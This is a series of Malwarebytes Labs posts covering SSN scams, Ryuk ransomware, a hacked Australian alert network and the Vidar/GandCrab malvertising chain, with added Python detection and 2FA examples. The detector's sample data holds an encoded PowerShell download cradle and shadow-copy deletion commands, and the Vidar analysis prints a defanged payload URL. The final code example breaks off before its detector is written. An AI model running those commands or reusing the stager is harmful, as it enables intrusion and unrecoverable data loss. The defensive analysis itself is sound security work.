If you’re on Twitter, simply follow haveibeenpwned, a service maintained by security pro Troy Hunt. It will usually be one of the first places you’ll hear about any breach where data has been taken. After that, head over to the haveibeenpwned website and check if your emails have been included in any attacks. If they have, you’ll see a short summary of when it happened and what was taken. Note that you won’t see the stolen data.

Finally, you can register for alerts when any new breaches are added.

There’s really no need to go spelunking into the murky pools of hacker forums, looking in vain for a breach you may be on. Rest assured that if it’s happened, you’ll find out eventually—one way or another. At that point, it’s a case of changing your logins and applying whatever security steps are required to fix things up. Ransoms are always a major issue, whether from threats or infection files. If this story has any additional developments, we will of course update this post as to what anyone affected should do next.

The post Luas data ransom: the hacker who cried wolf? appeared first on Malwarebytes Labs.


Social Security Number scammers are at it again

Malwarebytes - Thu, 01/10/2019 - 21:05

The Federal Trade Commission (FTC) once again sounded the alarm in mid-December about the latest Social Security Number (SSN) scam that continues to affect thousands of Americans.

While most of us were only able to read about this type of scam in the past, the FTC now has an audio recording of an SSN scam robocall, which they released two weeks after the warning.

Play the audio below and familiarize yourselves with what an SSN scam sounds like. Take note of the sentence phrasing and the mild threat at the near end of the automated recording directed to those who aren’t motivated enough to call back the number it provided.


law enforcement agencies to suspend your Social Security number on an immediate basis, as we have received suspicious trails of information in your name. The moment you receive this message, I need you to get back to me on my department division toll-free number that is 1-888-952-5554. I repeat 1-888-952-5554. Verify the last four digits of your Social Security number when you call to better assist you with this issue. Now, if I don’t hear a call from you, we will have to issue an arrest warrant under your name and get you arrested. So, get back to me as soon as possible. Thank you.

This particular recording wasn’t specific about the “suspicious trails of information” they were referring to, but there have been reports to the FTC of scammers linking their target’s SSN to certain crimes they claim are taking place in Texas, such as illegally sending money outside of the country.

The FTC noted that the threat from individuals or groups pretending to be from the Social Security Administration (SSA) is growing rapidly. In fact, reports of SSN scams to the FTC rose 994 percent, from 3,200 in 2017 to 35,000 in 2018.

Not just a numb3rs g4m3

One attribute that makes SSN scams successful (and makes targets more likely to accept the call) is the scammers’ use of caller ID spoofing to mimic the legitimate contact number of the Social Security Administration (SSA), so that it is what appears on the caller ID when they contact targets. In this case, the scammers used 1-800-772-1213, the SSA’s national customer service number. Yet SSN scams are more than just a numbers game.

Seeing red

To help clue you in on other tactics used by SSN scammers, below is a list of red flags or tactics these scammers practice that anyone with a Social Security Number should at least be familiar with:

  • The call comes out of nowhere—especially if you haven’t contacted the SSA first or you have no ongoing business with them, such as a pending Social Security Disability (SSD) application. If you do have a pending application with the SSA, an agent may call if the information in the application isn’t complete, answers on the form aren’t legible, or the agent has found some discrepancies between the information you provided in the application and the information they got from other Federal agencies. An SSA agent will only ask for your SSN if the one you provided is invalid or incorrect.
  • The purported SSA agent makes untruthful or worrying requests or claims, such as:
    • Your SSN is suspended because of crime-related links (such as what the robocaller claims in the recording above). Fact: Social Security numbers do not get suspended.
    • You need to “reactivate” your suspended SSN. Then, scammers either ask for more information or a fee to do this.
    • You need to pay for something immediately, like a debt (and they won’t allow you to appeal the amount you owe).
    • You need to send over your payment via a means they specify, such as the agent requiring you to pay using your prepaid debit card.
    • You need to provide a bank routing number or card details over the phone.
    • Your SSN is linked to malicious activities that will lead to your arrest or deportation.
    • The SSA system is down, so you need to provide the purported agent with your personal information, such as SSN, date of birth, mother’s maiden name, and bank information.

“SSA employees do contact citizens by telephone for customer-service purposes, and in some situations, an SSA employee may request the citizen confirm personal information over the phone,” writes Andrew Cannarsa, communications director for the Office of the Inspector General (OIG). “However, SSA employees will never threaten you for information or promise a Social Security benefit approval or increase in exchange for information. In those cases, the call is fraudulent.”

Just hang up

Hanging up is the best course of action when you have answered a call, deliberately or accidentally, and realize at some point that it seems scammy. When in doubt, assume it’s a scam. Besides, no one, not even the legitimate SSA, will penalize you for hanging up on them. Remember that when it comes to nipping scams in the bud, you are in control. End it before they can say another word.

Prevention, of course, is still key. Being able to catch the known red flags we have identified above and knowing what to do should you see a legitimate SSA number flash in the caller ID screen—whether you do or don’t have outstanding business with them—can minimize the risk.

Is the SSA calling? Don’t pick up the phone. Instead, call the SSA yourself on its customer service number and ask whether they have been trying to reach you.

Other scams related to SSN

Unfortunately, children and the deceased aren’t safe from fraudsters and identity thieves, either. Parents, make sure you find the time to check your kids’ credit scores to make sure that they remain untouched and are not being built up by someone else. If you see something’s wrong, or if you see signs of potential identity theft, go to this FTC page to read more.

Relatives of deceased loved ones should do credit checks every now and then as well. The Identity Theft Resource Center has useful material on how one can protect the deceased’s identity and other tips.

When it comes to scams, the following is always true: does it seem suspicious or “off” in any way? If so, it probably is. Proceed with caution and guard your Social Security Number well.

The post Social Security Number scammers are at it again appeared first on Malwarebytes Labs.


Ryuk ransomware attacks businesses over the holidays

Malwarebytes - Tue, 01/08/2019 - 19:49

While families gathered for food and merriment on Christmas Eve, most businesses slumbered. Nothing was stirring, not even a mouse—or so they thought.

For those at Tribune Publishing and Data Resolution, however, a silent attack was slowly spreading through their networks, encrypting data and halting operations. And this attack was from a fairly new ransomware family called Ryuk.

Ryuk, which made its debut in August 2018, is different from many other ransomware families we’ve analyzed, not because of its capabilities, but because of the novel way it infects systems.

So let’s take a look at this elusive new threat. What is Ryuk? What makes it different from other ransomware attacks? And how can businesses stop it and similar threats in the future?

What is Ryuk?

Ryuk first appeared in August 2018, and while not incredibly active across the globe, at least three organizations were hit with Ryuk infections over the course of the first two months of its operations, landing the attackers about $640,000 in ransom for their efforts.

Despite a successful run so far, Ryuk itself offers only the functionality you would see in a number of other modern ransomware families. This includes the ability to identify and encrypt network drives and resources, as well as delete shadow copies on the endpoint. Deleting the shadow copies disables the Windows System Restore option for users, which makes it impossible to recover from the attack without external backups.

Ryuk “polite” ransom note

One interesting aspect of this ransomware is that it drops more than one note on the system. The second note is written in a polite tone, similar to notes dropped by BitPaymer ransomware, which adds to the mystery.

Ryuk “not-so-polite” ransom note

Similarities with Hermes

Researchers at Checkpoint have already conducted deep analysis of this threat, and one of their findings was that Ryuk shares many similarities with another ransomware family: Hermes.

Inside of both Ryuk and Hermes, there are numerous instances of similar or identical code segments. In addition, several strings within Ryuk have been discovered that refer to Hermes—in two separate cases.

When launched, Ryuk will first look for the Hermes marker that is inserted into each encrypted file. This is a means to identify if the file or system has already been attacked and/or encrypted.

The other case involves whitelisted folders, and while not as damning as the first, the fact that both ransomware families whitelist certain folder names is another clue that the two families might share originators. For example, both Ryuk and Hermes whitelist a folder named “Ahnlab”, the name of a popular South Korean security vendor.

If you know your malware, you might remember that Hermes was attributed to the Lazarus group, who are associated with suspected North Korean nation-state operations. This has led many analysts and journalists to speculate that North Korea was behind this attack.

We’re not so sure about that.

Notable attacks

Multiple notable Ryuk attacks have occurred over the last few months primarily in the United States, in which the ransomware infected large numbers of endpoints and demanded higher ransoms than what we typically see (15 to 50 Bitcoins).

One such attack was on the Onslow Water and Sewer Authority (OWASA) on October 15, 2018, which kept the organization from being able to use their computers for a time. While water and sewage services, as well as customer data, were untouched by the ransomware attack, it still caused significant damage to the organization’s network and resulted in numerous databases and systems being rebuilt from the ground up.

Infection method

According to Checkpoint and multiple other analysts and researchers, Ryuk is spread as a secondary payload through botnets, such as TrickBot and Emotet.

Here is the running theory: Emotet makes the initial infection on the endpoint. It has its own abilities to spread laterally throughout the network, as well as launch its own malspam campaign from the infected endpoint, sending additional malware to other users on the same or different networks.

From there, the most common payload that we have seen Emotet drop over the last six months has been TrickBot. This malware has the capability to steal credentials, and also to move around the network laterally and spread in other ways.

Both TrickBot and Emotet have been used as information stealers, downloaders, and even worms based on their most recent functionality.

At some point, for reasons we will explore later in this post, TrickBot will download and drop Ryuk ransomware on the system, assuming that the infected network is something that the attackers want to ransom. Since we don’t see even a fraction of the number of Ryuk detections as we see of Emotet and TrickBot through our product telemetry, we can assume that it’s not the default standard operation to infect systems with Ryuk after a time, but rather something that is triggered by a human attacker behind the scenes.


Let’s take a look at the stats for Emotet, Ryuk, and TrickBot from August until present-day and see if we can’t identify a trend.

Malwarebytes’ detections from August 1, 2018 – January 2, 2019

The blue line represents Emotet, 2018’s biggest information-stealing Trojan. While this chart only shows us August onward, rest assured that for much of the year, Emotet was on the map. However, as we sailed into Q4 2018, it became a much bigger problem.

The orange line represents TrickBot. These detections are expected to be lower than Emotet, since Emotet is usually the primary payload. This means that in order for TrickBot to be detected, it must have either been delivered directly to an endpoint or dropped by an Emotet infection that was undetected by security software or deployed on a system without it. In addition, TrickBot hasn’t been the default payload for Emotet for the entire year, as the Trojan has continuously swapped payloads, depending on time of year and opportunity.

Based on this, to get hit with Ryuk (at least until we figure out the real intention here) you would need to have either disabled, not installed, or not updated your security software. You would need to refrain from conducting regular scans to identify TrickBot or Emotet. You would need to either have unpatched endpoints or weak credentials for TrickBot and Emotet to move laterally throughout the network and then, finally, you would need to be a target.

That being said, while our detections of Ryuk are small compared to the other families on this chart, that’s likely because we caught the infection at an earlier stage of the attack, and because the circumstances for a Ryuk attack need to be just right, like Goldilocks’ porridge. Surprisingly enough, organizations have created the perfect environment for these threats to thrive. This may also explain the huge ransom demands: fewer infections mean fewer payouts, so each one has to be worth more.

Christmas campaign

While active earlier in the year, Ryuk didn’t make as many headlines as when it launched its “holiday campaign,” or rather the two largest sets of Ryuk infections, which happened around Christmastime.

The chart below shows our detection stats for Ryuk from the beginning of December until now, with the two infection spikes noted with stars.

Malwarebytes’ Ryuk detections December 5, 2018 – January 2, 2019

These spikes show that significant attacks occurred on December 24 and December 27.

Data Resolution attack

The first attack was on Data Resolution, a cloud hosting provider, on Christmas Eve. As you can see from above, it was the most Ryuk we had detected in a single day over the last month.

According to Data Resolution, Ryuk was able to infect systems by using a compromised login account. From there, the malware gave control of the organization’s data center domain to the attackers until the whole network was shut down by Data Resolution.

The company assures customers that no user data was compromised, and that the intent of the attack was to hijack, not steal. Given how this malware finds its way onto an endpoint in the first place, via credential-stealing Trojans such as TrickBot, they have probably lost at least some information.

Tribune Publishing attack

Our second star represents the December 27 attack, when multiple newsprint organizations under the Tribune Publishing umbrella (now or in the recent past) were hit with Ryuk ransomware, essentially disabling these organizations’ ability to print their own papers.

The attack was discovered late Thursday night, when one of the editors at the San Diego Union-Tribune was unable to send finished pages to the printing press. These issues have since been resolved.


We believe Ryuk is infecting systems using Emotet and TrickBot to distribute the ransomware. However, what’s unclear is why criminals would use this ransomware after an already-successful infection.

In this case, we can actually take a page from the Hermes playbook. We witnessed Hermes being used in Taiwan as a means to cover the tracks of another malware family already on the network. Is Ryuk being used in the same way?

Since Emotet and TrickBot are not state-sponsored malware, and they are usually automatically launched to a blanket of would-be victims (rather than identifying a target and being launched manually), it seems odd that Ryuk would be used in only a few cases to hide the infection. So perhaps we can rule this theory out.

A second, more probable theory is that the purpose of Ryuk is as a last ditch effort to extort more value from an already-juicy target.

Let’s say that the attackers behind Emotet and TrickBot have their bots map out networks to identify a target organization. If the target has a large enough infection spread of Emotet/TrickBot, and/or if its operations are critical or valuable enough that disruption would trigger an inclination to pay the ransom, then that might make them the perfect target for a Ryuk infection.

The true intention for using this malware can only be speculated at this point. However, whether it’s hiding the tracks of other malware or simply looking for ways to make more cash after stealing all the relevant data they could, businesses should be wary of writing this one off.

The fact remains that there are thousands of active Emotet and TrickBot infections all over the world right now. Any of the organizations that are dealing with these threats need to take them seriously, because an information stealer might turn into nasty ransomware at any time. This is the truth of our modern threat landscape.


As mentioned earlier, many analysts and journalists have decided that North Korea is the most likely attacker to be distributing Ryuk. While we can’t completely rule this out, we aren’t entirely sure it’s accurate.

Ryuk does match Hermes in many ways. Based on the strings found, it was likely built on top of, or is a modified version of Hermes. How the attackers got the source code is unknown, however, we have observed instances where criminals were selling versions of Hermes on hacker forums.

This introduces another potential reason the source code got into the hands of a different actor.

Identifying the attribution of this attack based on similarities between two families, one of which is associated with a known nation-state attack group (Lazarus) is a logical fallacy, as described by Robert M. Lee in a recent article, “Attribution is not Transitive – Tribute Publishing Cyber Attack as a Case Study.” The article takes a deeper dive into the errors of attribution based on flimsy evidence. We caution readers, journalists, and other analysts on drawing conclusions from correlations.


Now that we know how and potentially why Ryuk attacks businesses, how can we protect against this malware and others like it?

Let’s focus on specific technologies and operations that are proven effective against this threat.

Anti-exploit technology

The use of exploits for both infection and lateral movement has been increasing for years. The primary method of infection for Emotet at the moment is through spam with attached Office documents loaded with malicious scripts.

These malicious scripts are macros that, once the user clicks on “Enable content” (usually through some kind of social engineering trick), will launch additional scripts to cause havoc. We most commonly see JavaScript and PowerShell scripts, with PowerShell quickly becoming the de facto scripting language for infecting users.

While you can stop these threats by training users to recognize social engineering attempts or use an email protection platform that recognizes malicious spam, using anti-exploit technology can also block those malicious scripts from trying to install malware on the system.

In addition, using protection technologies such as anti-ransomware adds another layer of protection against ransomware infections, stopping them before they can do serious damage.
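As an added example (not code from the Malwarebytes post), the following Python triages Sysmon-style process-creation events for two of the behaviours described above: an Office application spawning a script host, which is how the macro-laden attachments discussed under anti-exploit technology hand off to PowerShell, and shadow-copy deletion via vssadmin or wmic, the step from the “What is Ryuk?” section that removes the local recovery option. The field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the sample events, the stager string and the `example.invalid` host are constructed for this example, and the vssadmin/wmic command forms are the generic ways shadow copies get deleted rather than strings taken from the Ryuk sample the post analyzed.

```python
"""Added example: triage Sysmon-style process-creation events for two of the
behaviours in the text. Field names follow Sysmon Event ID 1; SAMPLE_EVENTS
are constructed for this example, not real telemetry."""
import base64
import binascii
import re
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Common spellings of PowerShell's -EncodedCommand switch (it accepts prefixes).
_ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
_VSSADMIN_DELETE_RE = re.compile(r"(?i)\bdelete\s+shadows\b")
_WMIC_DELETE_RE = re.compile(r"(?i)\bshadowcopy\b.*\bdelete\b")


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmdline: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def classify_event(ev: Dict[str, str]) -> List[str]:
    """Tags for one process-creation event; an empty list means nothing flagged."""
    tags = []
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")

    # 1. Office document spawning a script host: the macro-to-script step
    #    the text describes as Emotet's usual entry.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        tags.append("office_spawned_script_host")

    # 2. Base64/UTF-16LE encoded PowerShell, the usual shape of that step.
    if image in {"powershell.exe", "pwsh.exe"} and decode_encoded_powershell(cmd) is not None:
        tags.append("powershell_encoded_command")

    # 3. Shadow-copy deletion, which removes the local recovery option.
    if (image == "vssadmin.exe" and _VSSADMIN_DELETE_RE.search(cmd)) or \
       (image == "wmic.exe" and _WMIC_DELETE_RE.search(cmd)):
        tags.append("shadow_copy_deletion")
    return tags


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> tags for every event that raised at least one tag."""
    hits = {}
    for i, ev in enumerate(events):
        tags = classify_event(ev)
        if tags:
            hits[i] = tags
    return hits


# Constructed sample events. The stager string is a placeholder and
# example.invalid is a reserved, non-resolving domain.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic shadowcopy delete"},
    {"ParentImage": r"C:\Windows\System32\services.exe",   # benign admin use
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c wscript C:\\Users\\Public\\a.vbs"},
]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"][:60], tags)
```

To run it over real Sysmon or EDR exports, load the events into the same dict shape. The Office-to-script-host rule is noisy on machines where users legitimately run macros, so tune OFFICE_APPS and SCRIPT_HOSTS per environment, and treat the shadow-copy rule as high severity: there are very few legitimate reasons for a user session to delete all shadow copies quietly.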

Regular, updated malware scans

This is a general rule that has been ignored enough times to be worth mentioning here. In order to have effective security solutions, they need to be used and updated frequently so they can recognize and block the latest threats.

In one case, the IT team of an organization didn’t even know they were lousy with Emotet infections until they had updated their security software. They had false confidence in a security solution that wasn’t fully armed with the tools to stop the threats. And because of that, they had a serious problem on their hands.


Network segmentation

This is a tactic that we have been recommending for years, especially when it comes to protecting against ransomware. To ensure that you don’t lose your mapped or networked drives and resources if a single endpoint gets infected, it’s a good idea to segment access to certain servers and files.

There are two ways to segment your network and reduce the damage from a ransomware attack. First, restrict access to certain mapped drives based on role requirements. Second, use a separate or third-party system for storing shared files and folders, such as Box or Dropbox.

Evolving threats

This last year has brought with it some novel approaches to causing disruption and devastation in the workplace. While ransomware was the deadliest malware for businesses in 2017, 2018 and beyond look to bring us multiple malware families deployed in a single attack chain.

What’s more, families like Emotet and TrickBot continue to evolve their tactics, techniques, and capabilities, making them more dangerous with each new generation. While today, we might be worried about Emotet dropping Ryuk, tomorrow Emotet could simply act as ransomware itself. It’s up to businesses and security professionals to stay on top of emerging threats, however minor they may appear, as they often signal a change in the shape of things to come.

Thanks for reading and safe surfing!

The post Ryuk ransomware attacks businesses over the holidays appeared first on Malwarebytes Labs.


Australia’s Early Warning Network compromised

Malwarebytes - Mon, 01/07/2019 - 17:59

An early warning network designed to notify subscribers about dangerous weather in Australia has been compromised. The hacker sent many bogus messages via phone, SMS, and email, telling users that the service had been hacked.

Early Warning Network, a service used by local governments to send notifications about weather hazards, found itself firing these rogue missives into the void late on Saturday evening. They haven’t revealed how many people received a message, but they caught the attack quickly and shut it down.

A warning from Early Warning Network

The website says:

At around 930pm EDT 5th January, the EWN Alerting system was illegally accessed with a nuisance message sent to a part of EWNs database. This was sent out via email, text message and landline. EWN staff at the time were able to quickly identify the attack and shut off the system limiting the number of messages sent out. Unfortunately, a small proportion of our database received this alert

The text sent to subscribers read as follows:

EWN has been hacked. Your personal data is not safe. Trying to fix the security issues. Email [address] if you wish to unsubscribe.

If you were on the receiving end of the email version, you would have found it to be identical:


Some people in EWN’s comments sections reported receiving phone calls simply stating “You have been hacked,” which would be a little alarming, to say the least. An Early Warning Network shouldn’t come with a warning, but this is where we’re at.

How did they do it?

The alert service has so far confirmed that the attack took place from inside Australia, and the rogue message was the result of login credentials obtained without permission. There’s no other information available at time of writing, but it does seem likely that this was a targeted spear phish.

EWN have also stated that user information wasn’t at risk:

The unauthorized alert sent on Saturday night was undertaken by an unauthorized person using illicitly gained credentials to login and post a nuisance spam-notification to some of our customers. The links used in this alert were non-harmful and your personal information was not compromised in this event. Investigations are continuing with the Police and Australian Cyber Security Centre involved.

This directly contradicts the hacker’s claim that “your personal data is not safe.” It is also claimed that the links in the emails and SMS messages were not harmful.

What was the point?

Given the flat denial of user data being put at risk, it seems this is more about reputation damage. Perhaps someone has a weirdly specific grudge against a lifesaving service, or maybe it’s just a trollish prank done for cheap laughs. Either way, it’s an incredibly careless thing to do.

In the Philippines, PHIVOLCS warns about seismic activity and volcano eruptions, while PAGASA deals with weather systems, typically via media alerts and social media. These are high-end setups, almost always government run. In the US, a variety of warnings are available under wireless emergency alerts, which can include everything from weather safety to AMBER alerts. Early warning systems can save thousands of lives, as the absence of any system to warn tourists and locals before the Boxing Day tsunami in 2004, which claimed more than 200,000 lives, made painfully clear.

That’s why alert system tampering is always a bad idea. If people unsubscribe as a result of this attack, they could potentially put their lives in danger. EWN is not a huge organisation, and this attack on their systems and reputation could have a huge impact. It’s no wonder police are quick to investigate the attack taking place on this particular network.

What can the affected organisation do now?

Given there’s no further information as to how credentials were obtained, we can only offer an educated guess. If our hunch from earlier is correct, and it is a targeted phish, then some staff training may be needed. Additionally, they shouldn’t be relying on “just” a password to keep things safe.

Even the longest password around is a chocolate fireguard if someone manages to swipe it. That’s where two-factor authentication (2FA) comes into play. If more than one person has to share a single login, there’s a number of ways to get around that, too. Some password managers let groups share logins without revealing the password. If you haven’t thought about beefing up password security, now is as good a time as ever.
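To make the second-factor point concrete, here is an added example (not EWN’s system or code from the Malwarebytes post) of a time-based one-time password check as defined in RFC 6238, built on RFC 4226 HOTP. The key and the expected codes are the published RFC test vectors, not any deployed secret. The part worth noting is `verify_totp`: it tolerates one step of clock drift, but it also refuses any counter at or below the last one the user already consumed, so a code captured by a phish is useless once the victim has used it, and a stolen password alone never gets past the login.

```python
"""Added example: a minimal TOTP (RFC 6238) second factor with replay protection.
The key used in __main__ is the RFC 4226/6238 test key, never a real secret."""
import hashlib
import hmac
import struct
import time
from typing import Optional


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamically truncated."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(key: bytes, at: float, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP over the number of time steps since the Unix epoch."""
    return hotp(key, int(at) // step, digits)


def verify_totp(key: bytes, code: str, at: float, last_counter: Optional[int] = None,
                step: int = 30, digits: int = 6, window: int = 1) -> Optional[int]:
    """Accept a code for the current step or +/- `window` steps (clock drift).

    Returns the counter that matched. The caller must persist it per user and
    pass it back as `last_counter` next time: any counter at or below it is
    refused, so a code captured by a phish cannot be replayed after use.
    """
    current = int(at) // step
    for delta in range(-window, window + 1):
        counter = current + delta
        if last_counter is not None and counter <= last_counter:
            continue
        # Constant-time comparison so response timing does not leak digits.
        if hmac.compare_digest(hotp(key, counter, digits), code):
            return counter
    return None


if __name__ == "__main__":
    secret = b"12345678901234567890"  # RFC test key, for demonstration only
    now = time.time()
    code = totp(secret, now)
    print("current code:", code, "accepted at counter", verify_totp(secret, code, now))
```

In a real deployment the per-user secret is generated from a CSPRNG, stored encrypted, and enrolled through a QR code or similar; the replay counter and a rate limit on failed attempts are what keep a six-digit code from being brute-forced or reused. Shared accounts are the one place this gets awkward, which is where the password-manager group sharing mentioned above earns its keep.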

Lasting ramifications

Most people have seen an article about hacked road signs at some point, and probably suppressed the odd giggle or two. There are good arguments for not doing that; there are great arguments for not messing with emergency alert systems.

It remains to be seen if the person responsible for this will be caught. This is definitely not a great situation for anyone reliant on the integrity of these networks in bad weather regions. Will anyone even believe the next message sent out? And how much trouble will the person who did this be in, should fatalities occur? Our feeling is, a slap on the wrist is not enough.

The post Australia’s Early Warning Network compromised appeared first on Malwarebytes Labs.


A week in security (December 31, 2018 – January 6, 2019)

Malwarebytes - Mon, 01/07/2019 - 17:33

Last week on Labs, we looked back at 2018 as the year of data breaches, homed in on pre-installed malware on mobile devices, and profiled a malicious duo, Vidar and GandCrab.

Other cybersecurity news
  • 2019’s first data breach: It took less than 24 hours. An unauthorized third party downloaded the details of 30,000 Australian public servants in Victoria. It was believed that a government employee was phished prior to the breach. (Source: CBR Online)
  • Dark Overlord hackers release alleged 9/11 lawsuit documents. The hacker group known as The Dark Overlord (TDO) targeted law firms and banks related to the 9/11 attack. TDO has a history of releasing stolen information after receiving payment for its extortions. (Source: Sophos’ Naked Security Blog)
  • Data of 2.4 million Blur password manager users left exposed online. 2.4 million users of the password manager, Blur, were affected by a data breach that happened in mid-December of last year and publicly revealed on New Year’s Eve. No passwords stored in the managers were exposed. (Source: ZDNet)
  • Hacker leaked data on Angela Merkel and hundreds of German lawmakers. A hacker leaked sensitive information, which includes email addresses and phone numbers, of Angela Merkel, senior German lawmakers, and other political figures on Twitter. The account was suspended following this incident. (Source: TechCrunch)
  • Hackers seize dormant Twitter accounts to push terrorist propaganda. Dormant Twitter accounts are being hacked and used to further push terrorist propaganda via the platform. It’s easy for these hackers to guess the email addresses of these accounts since Twitter, by default, reveals partly-concealed addresses which clue them in. (Source: Engadget)
  • MobSTSPY spyware weaseled its way into Google Play. Another spyware app made its way into Google Play and onto the mobile devices of thousands of users. The malware steals SMS messages, call logs, contact lists, and other files. (Source: SC Magazine UK)
  • Apple phone phishing scams getting better. A new phone-based scam targeting iPhone users was perceived to likely fool many because the scammer’s fake call is lumped together with a record of legitimate calls from Apple Support. (Source: KrebsOnSecurity)
  • Staying relevant in an increasingly cyber world. Small- to medium-sized businesses may not have the upper hand when it comes to hiring people with talent in cybersecurity, but this shouldn’t be an organization’s main focus. Dr. Kevin Harris, program director of cybersecurity for the American Military University, advised that employers must focus on giving all their employees “cyber skills.” (Source: Federal News Network)
  • Adobe issues emergency patch following December miss. Adobe released an out-of-band patch to address critical vulnerabilities in Acrobat and Reader. (Source: Dark Reading)

Stay safe, everyone!

The post A week in security (December 31, 2018 – January 6, 2019) appeared first on Malwarebytes Labs.


Vidar and GandCrab: stealer and ransomware combo observed in the wild

Malwarebytes - Fri, 01/04/2019 - 18:15

We have been tracking a prolific malvertising campaign for several weeks and captured a variety of payloads, including several stealers. One that we initially identified as Arkei turned out to be Vidar, a new piece of malware recently analyzed in detail by Fumik0_ in his post: Let’s dig into Vidar – An Arkei Copycat/Forked Stealer (In-depth analysis).

In Norse Mythology, Víðarr is a god and son of Odin, whose death it is foretold he will avenge. Being referred to as “The Silent One” seems to be fitting for this stealer that can loot from browser histories (including Tor Browser) and cryptocurrency wallets, capture instant messages, and much more.

We witnessed a threat actor using the Fallout exploit kit to distribute Vidar. But victims won’t notice that as much, as the secondary and noisier payload being pushed is GandCrab ransomware.


A malvertising chain leads us to the Fallout exploit kit followed by what we thought was an Arkei stealer. Upon closer look, while the sample did share a lot of similarities with Arkei (including network events), it was actually a newer and, at the time, not yet publicly described piece of malware now identified as Vidar.

Beyond Vidar’s stealer capabilities, we also noticed a secondary payload that was retrieved from Vidar’s own command and control (C2) server. The infection timeline showed that victims were first infected with Vidar, which tried to extract confidential information, before eventually being compromised with the GandCrab ransomware.

Malvertising and Fallout exploit kit

Torrent and streaming video sites drive a lot of traffic, and their advertising is often aggressive and poorly-regulated. A malicious actor using a rogue advertising domain is redirecting these site visitors according to their geolocation and provenance to at least two different exploit kits (Fallout EK and GrandSoft EK), although the former is the most active.

Stealers such as AZORult seem to be the favorite payload here, but we also noticed that Arkei/Vidar was quite common. In this particular instance, we saw Vidar being pushed via the Fallout exploit kit.


It should be noted that Vidar is sold as a product, and as such can be distributed by several different threat groups through different campaigns.

Vidar customers can customize the stealer via profiles, which gives them a way to adjust which kind of data they are interested in. Beyond the usual credit card numbers and other passwords stored in applications, Vidar can also scrape an impressive selection of digital wallets.

Upon execution on the system, Vidar will search for any data specified in its profile configuration and immediately send it back to the C2 server via an unencrypted HTTP POST request.

This includes high level system details (specs, running processes, and installed applications) and stats about the victim (IP address, country, city, and ISP) stored in a file called information.txt. This file is packaged along with other stolen data and zipped before being sent back to the C2 server.

GandCrab as a loader

Vidar also offers to download additional malware via its command and control server. This is known as the loader feature, and again, it can be configured within Vidar’s administration panel by adding a direct URL to the payload. However, not all instances of Vidar (tied to a profile ID) will download an additional payload. In that case, the server will send back a response of “ok” instead of a URL.

HTTP/1.1 200 OK
Date:
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Server: Pro-Managed
Content-Length: 51

http://ovz1.fl1nt1kk.10301.vps.myjino[.]ru/topup.exe;

Within about a minute after the initial Vidar infection, the victim’s files will be encrypted and their wallpaper hijacked to display the note for GandCrab version 5.04.
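Seen from the network side, that exfil-then-loader sequence is something proxy logs can catch. The Python below is an added example, not code from the post or from Malwarebytes: it runs a simple heuristic over constructed log lines, looking for a plain-HTTP POST of a zip archive followed within about a minute by an executable download. The log format, hostnames and timings are assumptions.

```python
"""Heuristic detection of a Vidar-style exfil-then-loader sequence.

Added example, not code from the post. The proxy log format is constructed:
one record per line, "ts host method url content_type bytes". It looks for an
unencrypted HTTP POST of a zip archive (the packaged information.txt and
stolen data) followed within about a minute by a download of an .exe, which
is the GandCrab hand-off described above.
"""
from datetime import datetime, timedelta
from typing import List, Tuple

WINDOW = timedelta(seconds=60)

# Constructed sample traffic; hosts are placeholders, not the real C2.
SAMPLE_LOG = """\
2019-01-04T10:00:01 c2.example.invalid POST http://c2.example.invalid/ application/zip 48211
2019-01-04T10:00:02 c2.example.invalid GET http://c2.example.invalid/ text/html 51
2019-01-04T10:00:40 dl.example.invalid GET http://dl.example.invalid/topup.exe application/octet-stream 290816
2019-01-04T11:30:00 files.example.invalid POST http://files.example.invalid/upload application/zip 1048576
"""


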